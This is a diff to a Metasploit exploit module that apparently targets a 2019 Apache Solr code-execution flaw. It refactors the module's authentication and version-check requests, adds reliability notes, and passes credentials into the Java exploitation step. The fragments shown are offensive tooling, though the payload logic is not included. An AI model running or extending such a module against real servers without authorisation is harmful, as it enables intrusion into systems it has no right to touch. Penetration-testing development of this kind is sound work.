@@ -105,6 +105,11 @@ class MetasploitModule < Msf::Exploit::Remote
         ],
         'DisclosureDate' => '2019-10-29', # ISO-8601 formatted
         'DefaultTarget' => 0,
+        'Notes' => {
+          'Stability' => [CRASH_SAFE],
+          'Reliability' => [REPEATABLE_SESSION],
+          'SideEffects' => [CONFIG_CHANGES]
+        },
         'Privileged' => false
       )
     )
@@ -128,7 +133,10 @@ class MetasploitModule < Msf::Exploit::Remote
 
   def check_auth
     # see if authentication is required for the specified Solr instance
-    auth_check = solr_get('uri' => normalize_uri(target_uri.path))
+    auth_check = solr_get(
+      'uri' => normalize_uri(target_uri.path, '/admin/info/system'),
+      'vars_get' => { 'wt' => 'json' }
+    )
 
     # successfully connected?
     unless auth_check
@@ -146,13 +154,18 @@ class MetasploitModule < Msf::Exploit::Remote
 
       # otherwise, try the given creds
       auth_string = basic_auth(datastore['USERNAME'], datastore['PASSWORD'])
-      attempt_auth = solr_get('uri' => normalize_uri(target_uri.path), 'auth' => auth_string)
+      attempt_auth = solr_get(
+        'uri' => normalize_uri(target_uri.path, '/admin/info/system'),
+        'vars_get' => { 'wt' => 'json' },
+        'auth' => auth_string
+      )
 
       # successfully connected?
       unless attempt_auth
         print_bad('Connection failed!')
         return nil
       end
+
       # if the return code is not 200, then authentication definitely failed
       unless attempt_auth.code == 200
         print_bad('Invalid credentials!')
@@ -167,9 +180,13 @@ class MetasploitModule < Msf::Exploit::Remote
       )
 
       @auth_string = auth_string
+      # return the response for use in check/exploit
+      return attempt_auth
     end
-    # a placeholder return value. Not requiring auth should throw no errors
-    ''
+
+    print_status("#{peer}: Authentication not required")
+    # return the response for use in check/exploit
+    auth_check
   end
 
   # check for vulnerability existence
@@ -179,20 +196,8 @@ class MetasploitModule < Msf::Exploit::Remote
       return CheckCode::Unknown('Authentication failed!')
     end
 
-    # send a GET request to get Solr and system details
-    ver = solr_get(
-      'uri' => normalize_uri(target_uri.path, '/admin/info/system'),
-      'vars_get' => { 'wt' => 'json' },
-      'auth' => @auth_string
-    )
-
-    # can't connect? that's an automatic failure
-    unless ver
-      return CheckCode::Unknown('Connection failed!')
-    end
-
     # convert to JSON
-    ver_json = ver.get_json_document
+    ver_json = auth_res.get_json_document
     # get Solr version
     solr_version = Rex::Version.new(ver_json['lucene']['solr-spec-version'])
     print_status("Found Apache Solr #{solr_version}")
@@ -377,7 +382,7 @@ class MetasploitModule < Msf::Exploit::Remote
     case target.name
     when /Java/
       @classloader_uri = start_service
-      execute_java('core_name' => @vuln_core[0])
+      execute_java('core_name' => @vuln_core[0], 'auth_string' => @auth_string)
       return
     end
 
